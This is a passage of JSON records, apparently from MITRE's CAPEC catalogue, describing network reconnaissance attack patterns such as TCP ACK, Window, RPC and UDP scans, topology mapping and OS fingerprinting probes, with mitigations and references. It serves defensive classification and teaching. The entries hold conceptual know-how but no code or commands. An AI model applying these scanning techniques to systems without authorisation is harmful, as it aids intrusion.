necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Employ a robust network defensive posture that includes a managed IDS/IPS."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. NULL scans are limited by the range of platforms against which they work.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Mitigations, Notes"}]}},"305":{"ID":"305","Name":"TCP ACK Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present. When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the adversary to analyze whether a firewall is stateful or non-stateful (described in notes). TCP ACK Scans are somewhat faster and more stealthy than other types of scans but often requires rather sophisticated analysis by an experienced person. A skilled adversary may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If a RST packet is received the target port is either closed or the ACK was sent out-of-sync. If no response is received, the target is likely using a stateful firewall."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.7 TCP ACK Scan, pg. 113"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Notes"}]}},"306":{"ID":"306","Name":"TCP Window Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary engages in TCP Window scanning to analyze port status and operating system type. TCP Window scanning uses the ACK scanning method but examine the TCP Window Size field of response RST packets to make certain inferences. While TCP Window Scans are fast and relatively stealthy, they work against fewer TCP stack implementations than any other type of scan. Some operating systems return a positive TCP window size when a RST packet is sent from an open port, and a negative value when the RST originates from a closed port. TCP Window scanning is one of the most complex scan types, and its results are difficult to interpret. Window scanning alone rarely yields useful information, but when combined with other types of scanning is more useful. It is a generally more reliable means of making inference about operating system versions than port status.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. Specifically, the adversary views the TCP window size from the returned RST packet if one was received. Depending on the target operating system, a positive window size may indicate an open port while a negative window size may indicate a closed port."}]},"Prerequisites":{"Prerequisite":"TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.8 TCP Window Scan, pg. 115"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"307":{"ID":"307","Name":"TCP RPC Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary scans for RPC services listing on a Unix/Linux host. This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port. Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types, are easily detected by IPS/IDS systems, and can only detect open ports when an RPC service responds. ICMP diagnostic message responses can help identify closed ports, however filtered and unfiltered ports cannot be identified through TCP RPC scans. There are two general approaches to RPC scanning: One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly. Discovering RPC services gives the attacker potential targets to attack, as some RPC services are insecure by default.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends RCP packets to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine which, if any, RPC service is running on that port. Responses will vary based on which RPC service is running."}]},"Prerequisites":{"Prerequisite":"RPC scanning requires no special privileges when it is performed via a native system utility."},"Resources_Required":{"Resource":"The ability to craft custom RPC datagrams for use during network reconnaissance via native OS utilities or a port scanning tool. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Typically, an IDS/IPS system is very effective against this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 7.5.2 RPC Grinding, pg. 156"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"308":{"ID":"308","Name":"UDP Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port. During a UDP scan, a datagram is sent to a target port. If an \'ICMP Type 3 Port unreachable\' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends UDP packets to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open."}]},"Prerequisites":{"Prerequisite":"The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply."},"Resources_Required":{"Resource":"The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":["Firewalls or ACLs which block egress ICMP error types effectively prevent UDP scans from returning any useful information.","UDP scanning is complicated by rate limiting mechanisms governing ICMP error messages."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54-69"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 5.4 RPC Grinding, pg. 101"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"309":{"ID":"309","Name":"Network Topology Mapping","Abstraction":"Standard","Status":"Draft","Description":"An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"169","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Prerequisites":{"Prerequisite":"None"},"Resources_Required":{"Resource":"Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1016","Entry_Name":"System Network Configuration Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"310":{"ID":"310","Name":"Scanning for Vulnerable Software","Abstraction":"Detailed","Status":"Draft","Description":"An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Prerequisites":{"Prerequisite":["Access to the network on which the targeted system resides.","Software tools used to probe systems over a range of ports and protocols."]},"Skills_Required":{"Skill":["To probe a system remotely without detection requires careful planning and patience.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"312":{"ID":"312","Name":"Active OS Fingerprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in activity to detect the operating system or firmware version of a remote target by interrogating a device, server, or platform with a probe designed to solicit behavior that will reveal information about the operating systems or firmware in the environment. Operating System detection is possible because implementations of common protocols (Such as IP or TCP) differ in distinct ways. While the implementation differences are not sufficient to \'break\' compatibility with the protocol the differences are detectable because the target will respond in unique ways to specific probing activity that breaks the semantic or logical rules of packet construction for a protocol. Different operating systems will have a unique response to the anomalous input, providing the basis to fingerprint the OS behavior. This type of OS fingerprinting can distinguish between operating system types and versions.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1082","Entry_Name":"System Information Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"313":{"ID":"313","Name":"Passive OS Fingerprinting","Abstraction":"Standard","Status":"Stable","Description":"An adversary engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods, it is generally better able to evade detection.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"224"}},"Prerequisites":{"Prerequisite":"The ability to monitor network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"Any tool capable of monitoring network communications, like a packet sniffer (e.g., Wireshark)"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"317":{"ID":"317","Name":"IP ID Sequencing Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe analyzes the IP \'ID\' field sequence number generation algorithm of a remote host. Operating systems generate IP \'ID\' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP \'ID\' sequence number analysis - IP \'ID\' Sequencing: analyzing the IP \'ID\' sequence generation algorithm for one protocol used by a host and Shared IP \'ID\' Sequencing: analyzing the packet ordering via IP \'ID\' values spanning multiple protocols, such as between ICMP and TCP.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses"}]}},"318":{"ID":"318","Name":"IP \'ID\' Echoed Byte-Order Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests to determine if the remote host echoes back the IP \'ID\' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP \'ID\' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"319":{"ID":"319","Name":"IP (DF) \'Don\'t Fragment Bit\' Echoing Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests to determine if the remote host echoes back the IP \'DF\' (Don\'t Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the \'DF\' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Attack_Patterns, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"320":{"ID":"320","Name":"TCP Timestamp Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe examines the remote server\'s implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine if timestamps are present.] The adversary sends a probe packet to the remote host to identify if timestamps are present."},{"Step":"2","Phase":"Experiment","Description":"[Record and analyze timestamp values.] If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.","Technique":["The adversary sends several requests and records the timestamp values.","The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.","The adversary compares this result to a database of known TCP timestamp increments for a possible match."]}]},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Related_Weaknesses"}]}},"321":{"ID":"321","Name":"TCP Sequence Number Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe tests the target system\'s assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero 